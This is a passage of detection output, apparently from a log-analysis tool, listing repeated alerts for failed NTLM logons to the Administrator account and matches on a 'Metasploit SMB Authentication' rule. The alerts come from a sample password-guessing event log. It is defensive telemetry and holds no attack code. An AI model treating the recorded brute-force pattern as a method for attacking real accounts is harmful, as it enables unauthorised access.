Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dIfXRZQkKRJAw4er : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.868 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8wrqSJPALo5QtUnS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.933 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 81Mm67AdwpPJMCMm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.981 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.035 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Jwq5jXlMRU1SNLO5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.035 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d7OYj8ynCEl5dG9m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.076 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YzT8vF7ANYnjSRgd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.127 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m4eYIoww4uL6oYZu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.199 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DpO8L2Fky4zYwp2q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.199 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jGmxSy48sphENTiY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.244 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tQVAkjteLFK0hbyE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.285 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.330 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UMWKsQ8l0j9fZPfA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.330 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2ct7xYUYH9sr7mva : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.381 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.423 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GBn0XxaPOZQokJ0Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.423 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.463 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nQELRxrGuXqkYgO3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.463 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.509 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5eT0mykgLNZQygq9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.509 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qMyIqRidF6oBdzog : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.557 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ULnnFcF98k9zpNTl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j5k02pcelZNGwF3u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qfcC6LqJqs0EeGjE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.693 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mXALYkkitmyAFq14 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zIqQmExq22WrW4md : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.780 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ydHqjdZhLMI9gjfj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.825 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.865 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IMSe45VZNPdovPbq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.865 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.910 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hiHlcR6qNGE0P7TK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.910 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iT3jPdHr89RqPlyd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.950 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0QFnABeYK39XEntR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.985 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5plMYSBQi5mKmdlk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.068 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.113 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5TaxWckQUCMgWvCZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.113 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 81xZ7iisEyTABmUm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.153 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.187 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qYiQ2xjMQFQwH2XY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.187 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eRN8e3yzZzxc2p3A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QCa6PN0C7XznvipG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.275 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.311 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hFqjIXbEb7eWUFUi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.311 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FkrVjLgnJZlIyXpk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2r5tyuIYijAXN5be : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AgjQNe9hQrLIETDn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.442 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KRNoInpFTsixZDIu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ladJUS6I0HMIwdef : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.523 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6oW63pJlVtjgn3YY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.556 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xKNu8b2To2Y1twUr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q9sN5xm3GytfmM7G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FtQQS61GYBm6WUUz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.684 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3WxxawZZMhNCGHxc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sKP8G2VgJlrr9LMR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.764 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VvOsNQpk3c5p1FgK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.839 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H7oz7NPh5Z8UrDPW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.839 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.890 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VvzNFOLBlBv98Do4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.890 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 